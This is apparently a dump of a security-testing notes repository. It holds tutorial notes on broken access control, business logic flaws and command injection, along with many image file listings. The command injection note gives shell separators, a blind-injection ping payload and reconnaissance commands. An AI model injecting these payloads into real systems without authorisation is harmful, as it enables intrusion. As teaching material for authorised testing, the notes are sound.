https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 12.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 13.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 14.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 15.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 16.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 17.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 18.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 19.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 2.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 3.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 4.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 5.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 6.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 7.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 8.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 9.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/burpproject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/burpproject.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/dashboard.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/dashboard.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/deploy.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/deploy.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/enter_to_procee.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/enter_to_procee.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/h1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/h1.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/heroku_terms.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/heroku_terms.jpeg -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 1.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 2.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 3.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 4.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 5.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled 6.png -------------------------------------------------------------------------------- /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea.md: -------------------------------------------------------------------------------- 1 | # Vulnerability types 2 | 3 | [CSRF](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/CSRF%209bfcc03c9ce246a58d4815982e85bc18.md) 4 | 5 | [IDOR](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/IDOR%20bb563c4b361c417cb6e3ec4268889a83.md) 6 | 7 | [XSS](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/XSS%200ad0878f33094ea6b8ac90e94c2b0dc2.md) 8 | 9 | [Template injections](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Template%20injections%205633da87439b4f3b91e56feeb5a3332f.md) 10 | 11 | [BAC](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/BAC%20f2481eba6f7c4873b99b33739bb87033.md) 12 | 13 | [XXE](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/XXE%20dbfdda26a21f48c7b1056cb7693481bb.md) 14 | 15 | [SSRF](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/SSRF%20810a9009d00349518ca3c663f36100ea.md) 16 | 17 | [Command injection](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36.md) 18 | 19 | [Business logic flaws](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Business%20logic%20flaws%20fa68e1871a024a6a95399dd4cc2718a0.md) 20 | 21 | [Insecure deserialization](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad.md) 22 | 23 | [The Origin Of Business logic vulnerabilities](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/The%20Origin%20Of%20Business%20logic%20vulnerabilities%209f522fca6a7044b4a9ae9c1522696b5c.md) -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/BAC f2481eba6f7c4873b99b33739bb87033.md: -------------------------------------------------------------------------------- 1 | # BAC 2 | 3 | # What is it 4 | 5 | BAC: Broken Access Control 6 | 7 | Broken Access Control is exactly as it states. It can manifest itself in both horizontal and vertical privilege escalation. 8 | 9 | When we speak about privilege escalation, we are talking about the ability to execute functionality we are not supposed to be able to execute. But what exactly do we mean by verticale and horizontal? 10 | 11 | If that functionality is something we can execute, but not with the parameters we feed into it, we are talking about horizontal priviledge escalation. A good example of this would be IDORs. If on the other hand, we can not execute that functionality at all, not even with our own data, we are talking about Verticale priviledge escalation. 12 | 13 | We can also give a few examples of this behaviour but first we need to define some properties. To speak of BAC, we need to have the following conditions met: 14 | 15 | - We need to be able to create different users OR need to be assigned different users 16 | - The users need to be of different privilege levels if we want to test for verticale privilege escalation. For example an admin and a normal user 17 | - There need to be functions that our low privilege user is not authorised to execute, either with the given data or at all 18 | 19 | Some examples: 20 | 21 | - We have an admin and a normal user. We can test the admin settings with the low priv user 22 | - We have a normal user and a prospect user. The prospect user can not execute all the functions because he only has a trial account 23 | - We have two users of the same authorisation level: See IDOR 24 | 25 | # Attack strategy 26 | 27 | Again we can test this manually or we can test this semi automatic. I do not believe robots have the ability to execute complex stateful scenario’s where often sequential steps rely on previous input. 28 | 29 | ## Manually 30 | 31 | To test for BAC manually, we have several options at our disposal. One of the most powerful tools we have is javascript and the developer console of the browser. 32 | 33 | JavaScript files will contain functions that can be executed. One common tactic developers use to protect their programs is to simply disable the UI elements. This means that the javascript functions might still be executable. If that is the case, say for example if we can not click on the UI element to open the invoices BUT we might be able to execute the javascript function which prints the invoice details, we have a BAC on our hands. 34 | 35 | You may have noticed this requires some knowledge of how your target works because you need to know which levels of authorisation exist and what those types of accounts can and can’t do. You will also need to be able to recognise what the different javascript functions might do. 36 | 37 | We talked a bit about the developer console of the browser as well because there is a tab called “console” which will let you execute any javascript and it has Intellisense. This means you can type any letter and the console will automatically search through all the javascript files that contain that letter and display them to you. On top of the previously discussed advantages, we can also execute our javascript functions and directly observe the result. 38 | 39 | We can also take a more direct approach and simply log in as a high privilege user, navigate to functionality a low priv user can not execute, copy the URL, log in as the low priv user and paste the URL in the browser. A few caveats however are that we again need to be farmiliar with the levels of authorisation the program supports and what those types of users can and can not access. 40 | 41 | A last strategy we can take is bordering automation and it would be the first steps we need to prepare for the next chapter. 42 | 43 | We can also try and send all of our requests that low priv users can not execute to our repeater in the MiTM proxy such as burp and replace the authorisation method (such as JWT or session cookies, see IDOR). The point is not to grab the low priv users authorisation headers by the way, it is to test for broken access control issues. 44 | 45 | ## Semi-automated strategy 46 | 47 | We can use the same strategy we used as we did for IDORs here. Either the burp extension Authorize or match and replace can help us here. Please refer to Tools > Burp: Authorize and Burp: Match and replace. We can also use burp suite autorepeater but that plugin seems to have been broken in the last release. -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Business logic flaws fa68e1871a024a6a95399dd4cc2718a0.md: -------------------------------------------------------------------------------- 1 | # Business logic flaws 2 | 3 | # What is it? 4 | 5 | Business logic flaws often arise from different situations. They occur when users pass values to the target which are not expected. This can cause several unforseen things to occur. These things might not always be as impactful but sometimes they can be devistating. The analysts make assumptions about use behavior but these can be wrong. This will lead to flaws in the design and the implementation of the logic. 6 | 7 | The reason i love Logic flaws so much is because they are really hard to look for. Normal use of the application will not always show these and we have to specifically look for them. This makes it nearly impossibly for automated tools to be created that will find logic vulnerabilities on a consistant basis. 8 | 9 | Business process usually consists of: 10 | 11 | ```jsx 12 | Analysis > Development > Testing > Production 13 | ``` 14 | 15 | I know this process is very simplified but it's not important to know the details right now. Usually several "Stories" or "Features" get taken up into a release cycle. If the analysis from the start contains logic flaws, this is an entry point for our attack. 16 | 17 | What also sometimes happens is that a piece of software might be developed and a couple of years later an expansion or adaptation might be requested. Usually documentation is a big problem in companies so when a change has to be made to a certain feature, the developers will have to dig into the code where they might remove certain important features that gaurd the sanity of the users actions. 18 | 19 | # What is the impact? 20 | 21 | The impact is highly dependant on the specific target and logic flaw that you found. It is related to the impacted functionality as well. 22 | 23 | - Client side calculations of prices in a clothing webshop - High/Crit 24 | - This is core business for the target so any issue related to the core business will automatically be more impactful 25 | - When brute forcing usernames, you get a 200 OK status when the username you are trying to brute force exists and a 403 if it does not exist on the login page - Low 26 | - This is rather low unless those usernames really have to be secret, you'd have to brute force the login names and then you have to still guess the correct password. This is more usefull on a pentest job. 27 | - Negative amounts of items on a webshop lead to negative prices - High/Crit 28 | - This is core business for the target so any issue related to the core business will automatically be more impactful above all, impact on money directly is very important 29 | - If price = integer and amount = integer and total price = interger we can overflow total price when we price * amount - Critical 30 | - This might lead to the target returning us money which is certainly not desireable 31 | - Registering with the same username as an existing user takes over the account - Critical 32 | - Account takeovers are always higher on the severity scale 33 | - The user manual might tell you that you can't deactivate super admin users, but after trying it you can - Medium 34 | - You have to be a priviledged user to even be allowed into the user management system so this lowers the severity a bit 35 | - Field in the response that's not in the original request but does get processed by the server when you add it - Nothing/Critical 36 | - This really depends on the fields that is being processed here. If you can change your accounttype from "User" to "Admin" This would ofcourse be a big problem. 37 | - Importing products with the same name as existing ones overwrites them. Even if the products do not belong to you and you should not be able to overwrite them. - Medium 38 | - You are already in a priviledged position before you can import products, this lowers the severity -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 1.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 10.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 11.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 2.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 3.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 4.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 5.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 6.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 7.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 8.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled 9.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/CSRF 9bfcc03c9ce246a58d4815982e85bc18/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36.md: -------------------------------------------------------------------------------- 1 | # Command injection 2 | 3 | # What is it? 4 | 5 | Command injection happens when we can control a parameter that gets passed into a shell. If that input is not handled safely and sanitised properly, we can insert a command into our input and have that executed by the shell. Depending on the capabilities and privilidges of that shell, we can execute various commands. 6 | 7 | The theory sounds very simple however it's not simple at all to find this kind of vulnerability. 8 | 9 | ![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled.png) 10 | 11 | # Attack strategy 12 | 13 | The reason command injection is so hard to find is because we never really know which of our processes will trigger a back-end shell to execute. This means we will need to fuzz every parameter we find but you might be wondering what characters to fuzz with. To determine this, we first need to talk about which command separators can possibly be used and also which commands. 14 | 15 | ## Separators 16 | 17 | The following command separators work on both Windows and Unix-based systems: 18 | 19 | - `&` 20 | - `&&` 21 | - `|` 22 | - `||` 23 | 24 | The following command separators work only on Unix-based systems: 25 | 26 | - `;` 27 | - Newline (`0x0a` or `\n`) 28 | 29 | On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command: 30 | 31 | - ``` injected command ``` 32 | - `$(` injected command `)` 33 | 34 | ## Commands 35 | 36 | Below is a summary of some commands that are useful on Linux and Windows platforms: 37 | 38 | [Linux and windows commands](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Linux%20and%20windows%20commands%208ed7d380f0a740dfbdb72395dccf7cc8.csv) 39 | 40 | ## fuzzing list 41 | 42 | Based on this, we can create a fuzzing list that contains all the seperators togheter with all the possible commands. I will leave this up to you as it should be a good exercise. Feel free to contact me on discord if you have issues with this however. 43 | 44 | Fuzz every single parameter you can find with this worldlist by using burp intruder. 45 | 46 | ![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%201.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%201.png) 47 | 48 | ![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%202.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%202.png) 49 | 50 | As you can see in the screenshot, we load in our fuzzing list and mark the parameters we want to test. 51 | 52 | ## Blind command injection 53 | 54 | We can test for blind command injection by launching a request that will execute a ping command to the loopback adress. 55 | 56 | ```jsx 57 | & ping -c 10 127.0.0.1 & 58 | ``` 59 | 60 | Again, add this to your fuzzing list and mind the response time for this attack vector. If it's longer than 10 seconds, we probably have a blind command injection but be mindful as lag might occur and give a false positive. -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8.csv: -------------------------------------------------------------------------------- 1 | Purpose of command,Linux,Windows 2 | Name of current user,whoami,whoami 3 | Operating system,uname -a,ver 4 | Network configuration,ifconfig,ipconfig /all 5 | Network connections,netstat -an,netstat -an 6 | Running processes,ps -ef,tasklist -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Name of current user beb0eeaa290a4e0aac30baa74c77087d.md: -------------------------------------------------------------------------------- 1 | # Name of current user 2 | 3 | Linux: whoami 4 | Windows: whoami -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Network configuration 0cf0bc2bcef047ffa7cf5f6f3586dd02.md: -------------------------------------------------------------------------------- 1 | # Network configuration 2 | 3 | Linux: ifconfig 4 | Windows: ipconfig /all -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Network connections 4676cf7a1c6242d8812e5477a55968f4.md: -------------------------------------------------------------------------------- 1 | # Network connections 2 | 3 | Linux: netstat -an 4 | Windows: netstat -an -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Operating system 8f3db179a87b4ec487f0386b866951c7.md: -------------------------------------------------------------------------------- 1 | # Operating system 2 | 3 | Linux: uname -a 4 | Windows: ver -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Running processes c8592e3c8fe9486eab2b3122c43f318c.md: -------------------------------------------------------------------------------- 1 | # Running processes 2 | 3 | Linux: ps -ef 4 | Windows: tasklist -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled 1.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled 2.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Untitled.png: -------------------------------------------------------------------------------- 